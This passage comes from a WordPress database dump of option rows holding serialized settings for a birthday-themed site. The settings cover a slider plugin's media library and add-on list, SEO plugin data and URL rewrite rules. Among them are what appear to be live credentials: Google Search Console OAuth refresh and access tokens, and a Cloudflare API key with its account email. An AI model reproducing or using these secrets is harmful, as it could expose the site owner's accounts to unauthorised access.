Landscape\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:308;a:12:{s:2:\"id\";s:2:\"89\";s:6:\"handle\";s:19:\"mountain_view_4.jpg\";s:4:\"name\";s:15:\"Mountain View 4\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1203\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:359;a:13:{s:2:\"id\";s:3:\"238\";s:6:\"handle\";s:12:\"Mt_Baker.jpg\";s:5:\"video\";s:12:\"Mt_Baker.mp4\";s:4:\"name\";s:9:\"Mt Baker \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:360;a:13:{s:2:\"id\";s:3:\"237\";s:6:\"handle\";s:16:\"Two-Swimmers.jpg\";s:5:\"video\";s:16:\"Two-Swimmers.mp4\";s:4:\"name\";s:13:\"Two Swimmers \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:361;a:13:{s:2:\"id\";s:3:\"236\";s:6:\"handle\";s:14:\"Boats_Maze.jpg\";s:5:\"video\";s:14:\"Boats_Maze.mp4\";s:4:\"name\";s:11:\"Boats Maze \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:362;a:13:{s:2:\"id\";s:3:\"235\";s:6:\"handle\";s:18:\"Candolim-Beach.jpg\";s:5:\"video\";s:18:\"Candolim-Beach.mp4\";s:4:\"name\";s:15:\"Candolim Beach \";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:363;a:13:{s:2:\"id\";s:3:\"234\";s:6:\"handle\";s:17:\"Working-Space.jpg\";s:5:\"video\";s:17:\"Working-Space.mp4\";s:4:\"name\";s:14:\"Working Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:364;a:13:{s:2:\"id\";s:3:\"233\";s:6:\"handle\";s:9:\"Wavez.jpg\";s:5:\"video\";s:9:\"Wavez.mp4\";s:4:\"name\";s:6:\"Wavez \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:365;a:13:{s:2:\"id\";s:3:\"232\";s:6:\"handle\";s:17:\"Coconut-Grove.jpg\";s:5:\"video\";s:17:\"Coconut-Grove.mp4\";s:4:\"name\";s:14:\"Coconut Grove \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:366;a:13:{s:2:\"id\";s:3:\"231\";s:6:\"handle\";s:19:\"Very-Open-Space.jpg\";s:5:\"video\";s:19:\"Very-Open-Space.mp4\";s:4:\"name\";s:16:\"Very Open Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:367;a:13:{s:2:\"id\";s:3:\"230\";s:6:\"handle\";s:14:\"Office-Day.jpg\";s:5:\"video\";s:14:\"Office-Day.mp4\";s:4:\"name\";s:11:\"Office Day \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:368;a:13:{s:2:\"id\";s:3:\"229\";s:6:\"handle\";s:12:\"The-Hill.jpg\";s:5:\"video\";s:12:\"The-Hill.mp4\";s:4:\"name\";s:9:\"The Hill \";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}}s:4:\"tags\";a:18:{i:28;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}i:5;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:20;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:21;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}i:25;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}i:2;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:16;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}i:26;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}i:18;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:4;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:19;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:23;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}i:3;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:24;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}i:22;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:29;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}i:27;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}}','no'),(25550,'rs_tables_created','1','yes'),(25551,'revslider_table_version','1.0.6','yes'),(25552,'revslider-global-settings','s:1:\"1\";','yes'),(25553,'revslider_update_version','5.2.5.5','yes'),(25559,'wpseo_sitemap_page_cache_validator','6b5cL','no'),(25720,'wpseo-gsc-refresh_token','1/M5mH7EYpXU4KovcEVp3a2GbldAZEPZ6IiuWL5melWt0','yes'),(25721,'wpseo-gsc-access_token','a:5:{s:13:\"refresh_token\";s:45:\"1/M5mH7EYpXU4KovcEVp3a2GbldAZEPZ6IiuWL5melWt0\";s:12:\"access_token\";s:132:\"ya29.Gl1tBPxbW6SjoK3b64nyAAXHLCiUAlirvQHs89fXSNk7QGnO7_0NzruKbk3giNuiICreWWffBNFlIbZiLv7ExP7tn-MeR4NfmNhl5ekuT5AF2XunImgUPUnZiBNdTpM\";s:7:\"expires\";i:1497804395;s:10:\"expires_in\";i:3600;s:7:\"created\";i:1497800795;}','yes'),(25722,'wpseo-gsc','a:1:{s:7:\"profile\";s:25:\"http://birthdaypedia.com/\";}','yes'),(25725,'wpseo_gsc_issues_counts','a:3:{s:3:\"web\";a:6:{s:9:\"not_found\";a:2:{s:5:\"count\";s:1:\"9\";s:10:\"last_fetch\";N;}s:12:\"not_followed\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:13:\"access_denied\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:12:\"server_error\";a:2:{s:5:\"count\";s:1:\"1\";s:10:\"last_fetch\";N;}s:8:\"soft_404\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:5:\"other\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}}s:6:\"mobile\";a:5:{s:9:\"not_found\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:12:\"not_followed\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:13:\"access_denied\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:12:\"server_error\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:5:\"other\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}}s:15:\"smartphone_only\";a:9:{s:9:\"not_found\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:12:\"not_followed\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:13:\"access_denied\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:12:\"server_error\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:8:\"soft_404\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:7:\"roboted\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:16:\"faulty_redirects\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}i:0;a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:5:\"other\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}}}','yes'),(25726,'wpseo_gsc_last_fetch','1479998426','no'),(25735,'cloudflare_api_key','fb2903f2d5a56563e20a6ee30f4ece7402014','yes'),(25736,'cloudflare_api_email','contact@rave.media','yes'),(25737,'cloudflare_cached_domain_name','birthdaypedia.com','yes'),(25738,'rewrite_rules','a:109:{s:19:\"sitemap_index\\.xml$\";s:19:\"index.php?sitemap=1\";s:31:\"([^/]+?)-sitemap([0-9]+)?\\.xml$\";s:51:\"index.php?sitemap=$matches[1]&sitemap_n=$matches[2]\";s:24:\"([a-z]+)?-?sitemap\\.xsl$\";s:25:\"index.php?xsl=$matches[1]\";s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:6:\"amp/?$\";s:13:\"index.php?amp\";s:23:\"amp/page/([0-9]{1,})/?$\";s:31:\"index.php?amp&paged=$matches[1]\";s:24:\"/amp/page/([0-9]{1,})/?$\";s:40:\"index.php?amp&paged=$matches[1]&page_id=\";s:24:\"author\\/([^/]+)\\/amp\\/?$\";s:37:\"index.php?amp&author_name=$matches[1]\";s:44:\"author\\/([^/]+)\\/amp\\/page\\/?([0-9]{1,})\\/?$\";s:57:\"index.php?amp=1&author_name=$matches[1]&paged=$matches[2]\";s:23:\"category\\/(.+?)\\/amp/?$\";s:39:\"index.php?amp&category_name=$matches[1]\";s:44:\"category\\/(.+?)\\/amp\\/page\\/?([0-9]{1,})\\/?$\";s:57:\"index.php?amp&category_name=$matches[1]&paged=$matches[2]\";s:18:\"tag\\/(.+?)\\/amp/?$\";s:29:\"index.php?amp&tag=$matches[1]\";s:39:\"tag\\/(.+?)\\/amp\\/page\\/?([0-9]{1,})\\/?$\";s:47:\"index.php?amp&tag=$matches[1]&paged=$matches[2]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:29:\"category/(.+?)/amp(/(.*))?/?$\";s:51:\"index.php?category_name=$matches[1]&=$matches[3]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:26:\"tag/([^/]+)/amp(/(.*))?/?$\";s:41:\"index.php?tag=$matches[1]&=$matches[3]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:39:\"index.php?&page_id=20&cpage=$matches[1]\";s:14:\"amp(/(.*))?/?$\";s:26:\"index.php?&=$matches[2]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:29:\"author/([^/]+)/amp(/(.*))?/?$\";s:49:\"index.php?author_name=$matches[1]&=$matches[3]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:51:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/amp(/(.*))?/?$\";s:79:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&=$matches[5]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:38:\"([0-9]{4})/([0-9]{1,2})/amp(/(.*))?/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&=$matches[4]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:25:\"([0-9]{4})/amp(/(.*))?/?$\";s:42:\"index.php?year=$matches[1]&=$matches[3]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:22:\"(.?.+?)/amp(/(.*))?/?$\";s:46:\"index.php?pagename=$matches[1]&=$matches[3]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:22:\"([^/]+)/amp(/(.*))?/?$\";s:42:\"index.php?name=$matches[1]&=$matches[3]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(25739,'plugin_specific_cache','a:4:{s:2:\"id\";s:21:\"plugin_specific_cache\";s:5:\"value\";s:2:\"on\";s:8:\"editable\";b:1;s:11:\"modified_on\";s:25:\"2016-11-24T15:15:03+00:00\";}','yes'),(25771,'akismet_spam_count','163','yes'),(25772,'revslider-connection','1','yes'),(25773,'revslider-stable-version','4.2.0','yes'),(25774,'revslider-dashboard','a:0:{}','yes'),(25775,'revslider-addons','O:8:\"stdClass\":25:{s:25:\"revslider-particles-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:1:\"7\";s:9:\"releaseid\";s:1:\"7\";s:4:\"slug\";s:25:\"revslider-particles-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:16:\"Particle Effects\";s:6:\"line_1\";s:17:\"Let\'s Parti(cle)!\";s:6:\"line_2\";s:51:\"Add interactive particle animations to your sliders\";s:9:\"available\";s:5:\"1.0.6\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:2:\"10\";s:11:\"last_update\";s:10:\"2020-08-13\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:70:\"//updates.themepunch.tools/revslider/addons/images/addon_particles.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PT\";}}s:27:\"revslider-bubblemorph-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"20\";s:9:\"releaseid\";s:2:\"20\";s:4:\"slug\";s:27:\"revslider-bubblemorph-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:11:\"BubbleMorph\";s:6:\"line_1\";s:26:\"Include BubbleMorph Layers\";s:6:\"line_2\";s:33:\"for a decorative lava lamp 